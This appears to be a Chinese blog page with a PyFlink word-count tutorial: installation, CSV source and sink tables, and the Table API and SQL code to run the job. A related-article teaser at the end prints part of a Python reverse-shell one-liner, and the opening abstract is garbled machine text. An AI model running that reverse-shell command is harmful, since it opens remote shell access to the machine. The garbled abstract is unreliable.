pyflink从入门到入土

摘要:
t_环境连接\。带_格式\。使用_模式\。创建临时桌面环境连接\。带_格式\。使用_模式\。create_temporary_上表的程序显示了如何在ExecutionEnvironment中创建注册表名为mySource和mySink的表。源表mySource有一列:word,它表示以csv格式读取的输入文件Words的输入;结果表mySink有两列:word和count,它将计算结果输出到文件输出。在csv中,使用t作为字段之间的分隔符。接下来,我们将介绍如何创建作业:该作业读取表mySource中的数据,执行一些转换,然后将结果写入表mySink。最后,您需要启动FlinkPython表API作业。

一 安装环境与安装

您需要一台具有以下功能的计算机:

  • Java 8 or 11
  • Python 3.6, 3.7 or 3.8

使用Python Table API需要安装PyFlink,它已经被发布到 PyPi,您可以通过如下方式安装PyFlink:

$ python -m pip install apache-flink

安装PyFlink后,您便可以编写Python Table API作业了。

二 编写一个Flink Python Table API程序 

编写Flink Python Table API程序的第一步是创建TableEnvironment。这是Python Table API作业的入口类。

exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)

接下来,我们将介绍如何创建源表和结果表。

复制代码
t_env.connect(FileSystem().path('C:\\Users\\DELL\\Desktop\\PYFLINK\\input.csv')) \
.with_format(OldCsv()
.field('word', DataTypes.STRING())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())) \
.create_temporary_table('mySource')

t_env.connect(FileSystem().path('C:\\Users\\DELL\\Desktop\\PYFLINK\\ouput.csv')) \
.with_format(OldCsv()
.field_delimiter('\t')
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.create_temporary_table('mySink')
 
复制代码

上面的程序展示了如何创建及在ExecutionEnvironment中注册表名分别为mySourcemySink的表。 其中,源表mySource有一列: word,该表代表了从输入文件input.csv中读取的单词; 结果表mySink有两列: word和count,该表会将计算结果输出到文件output.csv中,字段之间使用\t作为分隔符。

接下来,我们介绍如何创建一个作业:该作业读取表mySource中的数据,进行一些变换,然后将结果写入表mySink

最后,需要做的就是启动Flink Python Table API作业。上面所有的操作,比如创建源表 进行变换以及写入结果表的操作都只是构建作业逻辑图,只有当execute_insert(sink_name)被调用的时候, 作业才会被真正提交到集群或者本地进行执行。

from pyflink.table.expressions import lit
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
.select(tab.word, lit(1).count) \
.execute_insert('mySink').wait()

该教程的完整代码如下:

复制代码
from pyflink.dataset import ExecutionEnvironment
from pyflink.table.descriptors import Schema, OldCsv, FileSystem
from pyflink.table.expressions import lit
from pyflink.table import (
    TableConfig,
    DataTypes,
    BatchTableEnvironment
)


exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)

t_env.connect(FileSystem().path('C:\\Users\\DELL\\Desktop\\PYFLINK\\input.csv')) \
    .with_format(OldCsv()
                 .field('word', DataTypes.STRING())) \
    .with_schema(Schema()
                 .field('word', DataTypes.STRING())) \
    .create_temporary_table('mySource')

t_env.connect(FileSystem().path('C:\\Users\\DELL\\Desktop\\PYFLINK\\ouput.csv')) \
    .with_format(OldCsv()
                 .field_delimiter('\t')
                 .field('word', DataTypes.STRING())
                 .field('count', DataTypes.BIGINT())) \
    .with_schema(Schema()
                 .field('word', DataTypes.STRING())
                 .field('count', DataTypes.BIGINT())) \
    .create_temporary_table('mySink')

tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
   .select(tab.word, lit(1).count) \
   .execute_insert('mySink').wait()
复制代码
复制代码
from pyflink.table import EnvironmentSettings, TableEnvironment,BatchTableEnvironment

environment_settings = EnvironmentSettings.new_instance().use_blink_planner().in_batch_mode().build()
t_env = BatchTableEnvironment.create(environment_settings=environment_settings)
t_env.get_config().get_configuration().set_string('parallelism.default', '1')

t_env.execute_sql("""
         CREATE TABLE mySource (
           word STRING
         ) WITH (
           'connector' = 'filesystem',
           'format' = 'csv',
           'path' = 'C:\\Users\\DELL\\Desktop\\PYFLINK\\input.csv'
         )
     """

)



t_env.execute_sql("""
         CREATE TABLE mySink (
           word STRING,
           `count` BIGINT
         ) WITH (
           'connector' = 'filesystem',
           'format' = 'csv',
           'path' = 'C:\\Users\\DELL\\Desktop\\PYFLINK\\word_count_output.csv'
         )
     """)
#
#t_env.from_path('mySource') \
#    .group_by('word') \
#    .select('word, count(1)') \
#    .execute_insert('mySink').wait()
#

from pyflink.table.expressions import lit
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
   .select(tab.word, lit(1).count) \
   .execute_insert('mySink').wait()
复制代码

三 执行一个Flink Python Table API程序

首先,你需要在文件 “input.csv” 中准备好输入数据。你可以选择通过如下命令准备输入数据:

input.csv

flink
pyflink
flink

接下来,可以在命令行中运行作业(假设作业名为WordCount.py)(注意:如果输出结果文件“output.csv”已经存在,你需要先删除文件,否则程序将无法正确运行起来):

$ python WordCount.py

上述命令会构建Python Table API程序,并在本地mini cluster中运行。如果想将作业提交到远端集群执行, 可以参考作业提交示例

最后,你可以通过如下命令查看你的运行结果:

ouput.csv

flink    2
pyflink    1

免责声明:文章转载自《pyflink从入门到入土》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇.NET插件系统c++实现多叉树树形显示(适合家谱的显示)下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

记一次对python反弹shell的分析

前言 昨天学习了反弹shell,对python弹shell产生了一些疑惑 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",1234));os.dup2(s.fileno(),0); o...

Docker打包python flask服务

1、将宿主机上python环境保存到requirements.txt pip3 freeze >requirements.txt 2、新建sources.list文件(apt的源文件) sources.list具体内容如下: $ vi sources.list deb-src http://archive.ubuntu.com/ubuntu x...

python使用zipfile解压文件中文乱码问题

中文在编程中真实后娘养的,各种坑爹,python3下中文乱码这个问题抓破了头皮,头疼。看了alex的文章,才有种恍然大悟的感觉(链接在底部)。 一句话,就是转换成unicode,压缩前是什么编码,使用什么编码encode再decode回来 先看测试代码: #-*- coding: utf-8 -*- import zipfile # 默认模式r,读 az...

antd+vue table表格 是否启用 状态显示

antd+vue table表格 是否启用 状态显示 小功能记录一下:单元格里面两个状态或者三个状态切换显示问题。官网里tag标签都是同时展示两个或三个,我这里是根据状态展示对应状态标签。通过试用v-if来控制显示标签,颜色样式自己设置。 这里展示的是部分代码 <template> <a-table :columns="columns...

python输入年月日,得出已经过了多少天?

#-*- coding: UTF-8 -*- importtime defWhat_day_of_the_year(inputTime): #函数,判断字符串是否为数字 defis_number(s): try: float(s) returnTrue exceptV...

在Python中运行gmssl

目录 在Python中运行gmssl Python版本 gmssl介绍 安装gmssl包 基于gmssl的SM2、3、4算法实现 SM2算法 SM3算法 SM4算法 在Python中运行gmssl Python版本 Python 3.8.1 gmssl介绍 ​ GmSSL是一个开源的加密包的python实现,支持SM2/SM3/SM4等...